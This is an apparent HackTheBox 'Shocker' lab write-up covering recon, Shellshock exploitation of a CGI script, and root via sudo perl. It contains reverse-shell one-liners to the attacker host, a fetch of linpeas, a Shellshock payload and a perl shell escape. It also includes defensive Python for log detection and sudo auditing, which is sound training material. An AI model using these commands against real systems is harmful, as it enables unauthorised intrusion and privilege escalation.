shocker


Introduction:

Recon

root@kinetic:…/hackthebox/shocker/data# nmap -sS -sC -sV -T4 -Pn -O -oN nmap.shocker.txt 10.10.10.56
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 21:15 EST
Nmap scan report for 10.10.10.56
Host is up (0.016s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.23 seconds

Port Scanner -

Port 80 is open
Port 2222 is open
Port scan completed in 0:00:41.872386

(py3) eneloop@kinetic:/oscp/tools/threader3000$ nikto -url http://10.10.10.56

  • Nikto v2.1.6

  • Target IP: 10.10.10.56
  • Target Hostname: 10.10.10.56
  • Target Port: 80
  • Start Time: 2021-01-23 21:17:38 (GMT-5)

  • Server: Apache/2.4.18 (Ubuntu)
  • The anti-clickjacking X-Frame-Options header is not present.
  • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  • Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
  • Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
  • Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
  • OSVDB-3233: /icons/README: Apache default file found.
  • 8673 requests: 0 error(s) and 7 item(s) reported on remote host
  • End Time: 2021-01-23 21:21:19 (GMT-5) (221 seconds)

  • 1 host(s) tested

eneloop@kinetic:/oscp/tools/threader3000$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://shocker.htb -x php,conf,cfg -t 24

Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)

[+] Url:            http://shocker.htb
[+] Threads:        24
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,conf,cfg
[+] Timeout:        10s

2021/01/23 21:26:12 Starting gobuster

/server-status (Status: 403)

2021/01/23 21:39:20 Finished

Enumeration

Exploitation

https://raw.githubusercontent.com/nccgroup/shocker/master/shocker.py

(py2) eneloop@kinetic:.../hackthebox/shocker/data$ ./shocker.py -H shocker.htb --cgi=/cgi-bin/user.sh

   .-. .            .
  (   )|            |
   `-. |--. .-.  .-.|.-. .-. .--.
  (   )|  |(   )(   |-.'(.-' |
   `-' '  `-`-'  `-''  `-`--''  v1.1

 Tom Watson, [email protected]
 https://www.github.com/nccgroup/shocker

 Released under the GNU Affero General Public License
 (https://www.gnu.org/licenses/agpl-3.0.html)


[+] Single target '/cgi-bin/user.sh' being used
[+] Checking connectivity with target...
[+] Target was reachable
[+] Looking for vulnerabilities on shocker.htb:80
[+] 1 potential target found, attempting exploits
[+] The following URLs appear to be exploitable:
  [1] http://shocker.htb:80/cgi-bin/user.sh
[+] Would you like to exploit further?
[>] Enter an URL number or 0 to exit: 1
[+] Entering interactive mode for http://shocker.htb:80/cgi-bin/user.sh
[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'
  > /etc/passwd
  > No response
  > date
  > No response
  > ls
  > No response

  > No response
  > which nc
  > No response
  > bash -i >& /dev/tcp/10.10.14.38/4444 0>&1
  > No response
  > /bin/sh -i >& /dev/tcp/10.10.14.38/4444 0>&1
  > No response
  >
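For the defender's side of this step, an added example that is not from the original writeup or from the shocker.py project: a small Python scanner that flags Shellshock markers in Apache access log lines. The sample log lines are constructed, and the parser assumes Apache's "combined" log format.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A Shellshock payload starts with an empty bash function definition, "() {",
# placed in any request value the CGI handler exports as an environment variable.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def check_line(line):
    """Return {host, time, path, field} if the line carries the marker, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    parts = rec["request"].split(" ")
    path = parts[1] if len(parts) > 1 else rec["request"]
    # The request line is logged URL-encoded; header values are not.
    fields = {"agent": rec["agent"], "referer": rec["referer"],
              "request": unquote(rec["request"])}
    for name, value in fields.items():
        if SHELLSHOCK_RE.search(value):
            return {"host": rec["host"], "time": rec["time"], "path": path, "field": name}
    return None

def scan(lines):
    return [h for h in map(check_line, lines) if h]

# Constructed sample lines, not taken from the box. The third carries the marker
# in User-Agent, which Apache hands to the CGI script as HTTP_USER_AGENT.
SAMPLE_LOG = [
    '10.10.14.38 - - [23/Jan/2021:21:17:38 -0500] "GET / HTTP/1.1" 200 559 "-" "Mozilla/5.0 (Nikto/2.1.6)"',
    '10.10.14.38 - - [23/Jan/2021:21:26:12 -0500] "GET /server-status HTTP/1.1" 403 299 "-" "gobuster/3.0.1"',
    '10.10.14.38 - - [23/Jan/2021:21:45:01 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; /bin/cat /etc/passwd"',
    '10.10.14.38 - - [23/Jan/2021:21:46:10 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['host']} Shellshock marker in {hit['field']}: {hit['path']}")
```

Only the third line is reported; the nikto and gobuster noise and the benign curl request to the same CGI pass through, which is the distinction a detection rule needs to make.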

Post-exploit/PrivEsc

eneloop@kinetic:…/hackthebox/shocker/data$ nc -lvnp 4444
listening on [any] 4444 …
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.56] 48750
/bin/sh: 0: can't access tty; job control turned off
$ ls -otr
total 4
-rwxr-xr-x 1 root 113 Sep 22  2017 user.sh
$ pws
/bin/sh: 2: pws: not found
$ whoami
shelly
$ pwd
/usr/lib/cgi-bin
$ cd
$ ls -l
total 4
-rwxr-xr-x 1 root root 113 Sep 22  2017 user.sh
$ cd /home
$ ls
shelly
$ cd shelly
$ ls
user.txt
$ cat user.txt
c74XXXXXXXXXXXXXXXXXXXXXXXXX7e
$ cd /tmp
$ ls -l
total 8
drwx------ 3 root root 4096 Jan 23 21:23 systemd-private-8d2c29e238904430862a2298afb60a92-systemd-timesyncd.service-A889Ai
drwx------ 2 root root 4096 Jan 23 21:23 vmware-root
$ wget http://10.10.14.38:8000/linpeas.sh
--2021-01-24 10:20:16--  http://10.10.14.38:8000/linpeas.sh
Connecting to 10.10.14.38:8000... connected.
HTTP request sent, awaiting response... 200 OK

====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#users
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

[+] Do I have PGP keys? /usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

[+] Clipboard or highlighted text? xsel and xclip Not Found

[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

https://gtfobins.github.io/gtfobins/perl/

$ sudo perl -e 'exec "/bin/sh";'
whoami
root
cd /root
ls
root.txt
cat root.txt
c0XXXXXXXXXXXXXXXXXXXXXXXXXX47
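As an added example, not part of the original writeup: an audit helper that parses sudo -l output like the block linpeas reported above and flags rules that hand the caller a shell, which is exactly what the NOPASSWD perl entry does. The SHELL_CAPABLE list is an assumed, abbreviated subset of GTFOBins' sudo entries, and the second rule in the sample (perl with a fixed script argument) is constructed to show a rule that is not flagged.

```python
import re

# Programs that give back an interactive shell when run via sudo; perl, the one
# this box grants with NOPASSWD, is the case the writeup shows. Assumed, abbreviated
# list drawn from the GTFOBins "sudo" function, not a complete one.
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "bash", "sh", "env",
                 "vi", "vim", "less", "more", "awk", "find"}

# One rule line as 'sudo -l' prints it: "(runas) TAG: cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output):
    """Return the rules listed after the 'may run the following commands' line."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line.strip() else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(),
                          "nopasswd": "NOPASSWD" in tags, "cmd": cmd.strip()})
    return rules

def risky_rules(output):
    """Rules that reach a shell: ALL, a bare shell-capable binary (the user picks
    the arguments, e.g. perl -e), or such a binary with a wildcard argument."""
    risky = []
    for r in parse_sudo_l(output):
        parts = r["cmd"].split()
        prog = parts[0].rsplit("/", 1)[-1]
        bare = len(parts) == 1 or any("*" in p for p in parts[1:])
        if r["cmd"] == "ALL" or (prog in SHELL_CAPABLE and bare):
            risky.append(r)
    return risky

# Constructed 'sudo -l' output: the first rule is the one linpeas found on the
# box, the second is a made-up fixed-argument rule for contrast.
SAMPLE = """Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/perl /opt/backup.pl
"""

if __name__ == "__main__":
    for r in risky_rules(SAMPLE):
        print(f"{r['runas']} {'NOPASSWD ' if r['nopasswd'] else ''}{r['cmd']}")
```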

Notes: